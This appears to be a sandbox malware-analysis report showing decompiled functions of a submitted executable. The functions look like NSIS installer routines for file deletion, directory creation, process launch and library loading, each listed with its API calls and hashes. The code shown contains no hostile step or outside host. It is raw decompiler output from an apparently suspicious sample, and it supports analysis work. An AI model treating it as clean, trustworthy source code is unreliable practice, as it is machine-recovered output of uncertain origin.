                          • Instruction ID: 82756e30bcf828709d5cbcfbd5bc5585b8b9ec353a8eaca6552b8bf5b5cc12a5
                          • Opcode Fuzzy Hash: 387721db96078c788ef05d401c52d1705cfc64557ecb0b14db2e4703a56ba408
                          • Instruction Fuzzy Hash: 70713371E04229CBDF28CF98C844BADBBB1FB44305F14816EE856B7291C7786A86DF45
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 41%
                          			E00405BCB(void* __eflags, WCHAR* _a4, signed int _a8) {
                          				int _t9;
                          				long _t13;
                          				WCHAR* _t14;
                          
                          				_t14 = _a4;
                          				_t13 = E00405FD2(_t14);
                          				if(_t13 == 0xffffffff) {
                          					L8:
                          					return 0;
                          				}
                          				_push(_t14);
                          				if((_a8 & 0x00000001) == 0) {
                          					_t9 = DeleteFileW();
                          				} else {
                          					_t9 = RemoveDirectoryW(); // executed
                          				}
                          				if(_t9 == 0) {
                          					if((_a8 & 0x00000004) == 0) {
                          						SetFileAttributesW(_t14, _t13);
                          					}
                          					goto L8;
                          				} else {
                          					return 1;
                          				}
                          			}






                          0x00405bcc
                          0x00405bd7
                          0x00405bdc
                          0x00405c0c
                          0x00000000
                          0x00405c0c
                          0x00405be3
                          0x00405be4
                          0x00405bee
                          0x00405be6
                          0x00405be6
                          0x00405be6
                          0x00405bf6
                          0x00405c02
                          0x00405c06
                          0x00405c06
                          0x00000000
                          0x00405bf8
                          0x00000000
                          0x00405bfa

                          APIs
                            • Part of subcall function 00405FD2: GetFileAttributesW.KERNELBASE(?,?,00405BD7,?,?,00000000,00405DAD,?,?,?,?), ref: 00405FD7
                            • Part of subcall function 00405FD2: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405FEB
                          • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405DAD), ref: 00405BE6
                          • DeleteFileW.KERNEL32(?,?,?,00000000,00405DAD), ref: 00405BEE
                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C06
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: File$Attributes$DeleteDirectoryRemove
                          • String ID:
                          • API String ID: 1655745494-0
                          • Opcode ID: 8eed124eda4cbc8430ddba83c09443e031bc029d4ce3365f7fb32bc961faff32
                          • Instruction ID: 9515068513ade5ae1f55316d2df80b31020678a3208768e1cfdcfcd0005f1fec
                          • Opcode Fuzzy Hash: 8eed124eda4cbc8430ddba83c09443e031bc029d4ce3365f7fb32bc961faff32
                          • Instruction Fuzzy Hash: 98E0E53110CB915AD21067348D08B5F7AE8EF86314F04093AF891F10C0D7789807CA7A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0040697F(void* __ecx, void* _a4) {
                          				long _v8;
                          				long _t6;
                          
                          				_t6 = WaitForSingleObject(_a4, 0x64);
                          				while(_t6 == 0x102) {
                          					E00406910(0xf);
                          					_t6 = WaitForSingleObject(_a4, 0x64);
                          				}
                          				GetExitCodeProcess(_a4,  &_v8); // executed
                          				return _v8;
                          			}





                          0x00406990
                          0x004069a7
                          0x0040699b
                          0x004069a5
                          0x004069a5
                          0x004069b2
                          0x004069be

                          APIs
                          • WaitForSingleObject.KERNEL32(?,00000064), ref: 00406990
                          • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 004069A5
                          • GetExitCodeProcess.KERNELBASE ref: 004069B2
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: ObjectSingleWait$CodeExitProcess
                          • String ID:
                          • API String ID: 2567322000-0
                          • Opcode ID: b4e22deffd65f84e370c04cbd1d88a1e749a9585608b68ea3518500749b930bb
                          • Instruction ID: 36eed24e95c07865df7b56cd3c3a37613c402ee52c1e894a6bace4c6932a2b17
                          • Opcode Fuzzy Hash: b4e22deffd65f84e370c04cbd1d88a1e749a9585608b68ea3518500749b930bb
                          • Instruction Fuzzy Hash: 25E0D8B1600508FBDF109B55DD06E9E7B6EDB84700F110037F601B61A0C7B6AE61DBA8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 86%
                          			E004015C1(short __ebx, void* __eflags) {
                          				void* _t17;
                          				int _t23;
                          				void* _t25;
                          				signed char _t26;
                          				short _t28;
                          				short _t31;
                          				short* _t34;
                          				void* _t36;
                          
                          				_t28 = __ebx;
                          				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                          				_t17 = E00405E81(_t16);
                          				_t32 = _t17;
                          				if(_t17 != __ebx) {
                          					do {
                          						_t34 = E00405E03(_t32, 0x5c);
                          						_t31 =  *_t34;
                          						 *_t34 = _t28;
                          						if(_t31 != _t28) {
                          							L5:
                          							_t25 = E00405AB5( *(_t36 + 8));
                          						} else {
                          							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                          							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405AD2(_t42) == 0) {
                          								goto L5;
                          							} else {
                          								_t25 = E00405A38( *(_t36 + 8)); // executed
                          							}
                          						}
                          						if(_t25 != _t28) {
                          							if(_t25 != 0xb7) {
                          								L9:
                          								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                          							} else {
                          								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                          								if((_t26 & 0x00000010) == 0) {
                          									goto L9;
                          								}
                          							}
                          						}
                          						 *_t34 = _t31;
                          						_t32 = _t34 + 2;
                          					} while (_t31 != _t28);
                          				}
                          				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                          					_push(0xfffffff5);
                          					E00401423();
                          				} else {
                          					E00401423(0xffffffe6);
                          					E00406507(0x436000,  *(_t36 + 8));
                          					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                          					if(_t23 == 0) {
                          						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                          					}
                          				}
                          				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t36 - 4));
                          				return 0;
                          			}











                          0x004015c1
                          0x004015c9
                          0x004015cc
                          0x004015d1
                          0x004015d5
                          0x004015d7
                          0x004015df
                          0x004015e1
                          0x004015e4
                          0x004015ea
                          0x00401604
                          0x00401607
                          0x004015ec
                          0x004015ec
                          0x004015ef
                          0x00000000
                          0x004015fa
                          0x004015fd
                          0x004015fd
                          0x004015ef
                          0x0040160e
                          0x00401615
                          0x00401624
                          0x00401624
                          0x00401617
                          0x0040161a
                          0x00401622
                          0x00000000
                          0x00000000
                          0x00401622
                          0x00401615
                          0x00401627
                          0x0040162b
                          0x0040162c
                          0x004015d7
                          0x00401634
                          0x00401663
                          0x004022f1
                          0x00401636
                          0x00401638
                          0x00401645
                          0x0040164d
                          0x00401655
                          0x0040165b
                          0x0040165b
                          0x00401655
                          0x00402c2d
                          0x00402c39

                          APIs
                            • Part of subcall function 00405E81: CharNextW.USER32(?,?,00425F10,?,00405EF5,00425F10,00425F10,76CDFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E8F
                            • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405E94
                            • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405EAC
                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                            • Part of subcall function 00405A38: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A7B
                          • SetCurrentDirectoryW.KERNELBASE(?,00436000,?,00000000,000000F0), ref: 0040164D
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                          • String ID:
                          • API String ID: 1892508949-0
                          • Opcode ID: 6ff43b3191649a75527d97ac2c164a3e64988898bdda7d9265b57bfb7f9fc5be
                          • Instruction ID: 5432bfb841e0ad51ec8b230ce72dc3ef5087fba7ddd62730da8486a2a7133ac3
                          • Opcode Fuzzy Hash: 6ff43b3191649a75527d97ac2c164a3e64988898bdda7d9265b57bfb7f9fc5be
                          • Instruction Fuzzy Hash: 0F110331504100EBCF216FA0CD40A9F36A0EF14328B24093BF941B12F1DA3E4A829B8D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 69%
                          			E00401389(signed int _a4) {
                          				intOrPtr* _t6;
                          				void* _t8;
                          				void* _t10;
                          				signed int _t11;
                          				void* _t12;
                          				signed int _t16;
                          				signed int _t17;
                          				void* _t18;
                          
                          				_t17 = _a4;
                          				while(_t17 >= 0) {
                          					_t6 = _t17 * 0x1c +  *0x42a250;
                          					if( *_t6 == 1) {
                          						break;
                          					}
                          					_push(_t6); // executed
                          					_t8 = E00401434(); // executed
                          					if(_t8 == 0x7fffffff) {
                          						return 0x7fffffff;
                          					}
                          					_t10 = E0040136D(_t8);
                          					if(_t10 != 0) {
                          						_t11 = _t10 - 1;
                          						_t16 = _t17;
                          						_t17 = _t11;
                          						_t12 = _t11 - _t16;
                          					} else {
                          						_t12 = _t10 + 1;
                          						_t17 = _t17 + 1;
                          					}
                          					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                          						 *0x42920c =  *0x42920c + _t12;
                          						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42920c, 0x7530,  *0x4291f4), 0);
                          					}
                          				}
                          				return 0;
                          			}











                          0x0040138a
                          0x004013fa
                          0x0040139b
                          0x004013a0
                          0x00000000
                          0x00000000
                          0x004013a2
                          0x004013a3
                          0x004013ad
                          0x00000000
                          0x00401404
                          0x004013b0
                          0x004013b7
                          0x004013bd
                          0x004013be
                          0x004013c0
                          0x004013c2
                          0x004013b9
                          0x004013b9
                          0x004013ba
                          0x004013ba
                          0x004013c9
                          0x004013cb
                          0x004013f4
                          0x004013f4
                          0x004013c9
                          0x00000000

                          APIs
                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                          • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          • Opcode ID: 970bce7bfd6110042ba11e2ba34b1580a3262637bb8a43ad7db674ac8d0d0c57
                          • Instruction ID: 40daf909c284af41af5c9cdf7f458e0296b91398e9c9917f7ae767538e8fd086
                          • Opcode Fuzzy Hash: 970bce7bfd6110042ba11e2ba34b1580a3262637bb8a43ad7db674ac8d0d0c57
                          • Instruction Fuzzy Hash: 1A01D131724220EBEB194B389D09B2A3698E710318F10867AF855F66F1E6788C129B5C
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00405AEA(WCHAR* _a4) {
                          				struct _PROCESS_INFORMATION _v20;
                          				int _t7;
                          
                          				0x426710->cb = 0x44;
                          				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426710,  &_v20); // executed
                          				if(_t7 != 0) {
                          					CloseHandle(_v20.hThread);
                          					return _v20.hProcess;
                          				}
                          				return _t7;
                          			}





                          0x00405af3
                          0x00405b13
                          0x00405b1b
                          0x00405b20
                          0x00000000
                          0x00405b26
                          0x00405b2a

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: CloseCreateHandleProcess
                          • String ID:
                          • API String ID: 3712363035-0
                          • Opcode ID: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
                          • Instruction ID: 90cc6d476167cb297d6b140a5f1e3d8b94c2ff7c6bb70ea469832da4d223c92c
                          • Opcode Fuzzy Hash: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
                          • Instruction Fuzzy Hash: F2E0BFB46002097FEB109B64ED45F7B77BCEB04608F414465BD54F6150DB74A9158E7C
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004068D4(signed int _a4) {
                          				struct HINSTANCE__* _t5;
                          				signed int _t10;
                          
                          				_t10 = _a4 << 3;
                          				_t8 =  *(_t10 + 0x40a3e0);
                          				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
                          				if(_t5 != 0) {
                          					L2:
                          					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
                          				}
                          				_t5 = E00406864(_t8); // executed
                          				if(_t5 == 0) {
                          					return 0;
                          				}
                          				goto L2;
                          			}





                          0x004068dc
                          0x004068df
                          0x004068e6
                          0x004068ee
                          0x004068fa
                          0x00000000
                          0x00406901
                          0x004068f1
                          0x004068f8
                          0x00000000
                          0x00406909
                          0x00000000

                          APIs
                          • GetModuleHandleA.KERNEL32(?,00000020,?,00403607,0000000B), ref: 004068E6
                          • GetProcAddress.KERNEL32(00000000,?), ref: 00406901
                            • Part of subcall function 00406864: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040687B
                            • Part of subcall function 00406864: wsprintfW.USER32 ref: 004068B6
                            • Part of subcall function 00406864: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068CA
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                          • String ID:
                          • API String ID: 2547128583-0
                          • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                          • Instruction ID: b54d22b37b479e59566a9631c032e51b8c6cd741f5ea0e4d018af200ac078f8b
                          • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                          • Instruction Fuzzy Hash: 48E086335042109AE21197715D44C7B73A8AF89650307443EF947F2080DB38DC31A669
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 68%
                          			E00405FF7(WCHAR* _a4, long _a8, long _a12) {
                          				signed int _t5;
                          				void* _t6;
                          
                          				_t5 = GetFileAttributesW(_a4); // executed
                          				asm("sbb ecx, ecx");
                          				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                          				return _t6;
                          			}





                          0x00405ffb
                          0x00406008
                          0x0040601d
                          0x00406023

                          APIs
                          • GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\dhGoVvfmul.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: File$AttributesCreate
                          • String ID:
                          • API String ID: 415043291-0
                          • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                          • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                          • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                          • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00405FD2(WCHAR* _a4) {
                          				signed char _t3;
                          				signed char _t7;
                          
                          				_t3 = GetFileAttributesW(_a4); // executed
                          				_t7 = _t3;
                          				if(_t7 != 0xffffffff) {
                          					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
                          				}
                          				return _t7;
                          			}





                          0x00405fd7
                          0x00405fdd
                          0x00405fe2
                          0x00405feb
                          0x00405feb
                          0x00405ff4

                          APIs
                          • GetFileAttributesW.KERNELBASE(?,?,00405BD7,?,?,00000000,00405DAD,?,?,?,?), ref: 00405FD7
                          • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405FEB
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                          • Instruction ID: 846b50f6ec280e5947384c74444241e6b9796591039fc91e932c01759f2cc32f
                          • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                          • Instruction Fuzzy Hash: 2CD0C972504531ABC2102728EE0889BBB55EF642717054A35FAA5A22B0CB304C529E98
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403ADC() {
                          				void* _t1;
                          				void* _t3;
                          				signed int _t6;
                          
                          				_t1 =  *0x40a018; // 0xffffffff
                          				if(_t1 != 0xffffffff) {
                          					CloseHandle(_t1);
                          					 *0x40a018 =  *0x40a018 | 0xffffffff;
                          					_t6 =  *0x40a018;
                          				}
                          				E00403B21();
                          				_t3 = E00405C13(_t6, L"C:\\Users\\jones\\AppData\\Local\\Temp\\nsb1FEC.tmp\\", 7); // executed
                          				return _t3;
                          			}






                          0x00403adc
                          0x00403ae4
                          0x00403ae7
                          0x00403aed
                          0x00403aed
                          0x00403aed
                          0x00403af4
                          0x00403b00
                          0x00403b05

                          APIs
                          • CloseHandle.KERNEL32(FFFFFFFF,00403A28,?), ref: 00403AE7
                          Strings
                          • C:\Users\user\AppData\Local\Temp\nsb1FEC.tmp\, xrefs: 00403AFB
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: CloseHandle
                          • String ID: C:\Users\user\AppData\Local\Temp\nsb1FEC.tmp\
                          • API String ID: 2962429428-1993839188
                          • Opcode ID: ea98741a50f28c62fa16d60caa101c986c2838e233e377089e9036697fda9458
                          • Instruction ID: d4db8dbaf33ff22f2ff991163c220eb3cd6c997f56162562831ac65c0e81f35c
                          • Opcode Fuzzy Hash: ea98741a50f28c62fa16d60caa101c986c2838e233e377089e9036697fda9458
                          • Instruction Fuzzy Hash: 15C01230504B0056D574AFB99E4FA053A649B4573DB600729B0F8B40F1CF7C5699995D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00405AB5(WCHAR* _a4) {
                          				int _t2;
                          
                          				_t2 = CreateDirectoryW(_a4, 0); // executed
                          				if(_t2 == 0) {
                          					return GetLastError();
                          				}
                          				return 0;
                          			}




                          0x00405abb
                          0x00405ac3
                          0x00000000
                          0x00405ac9
                          0x00000000

                          APIs
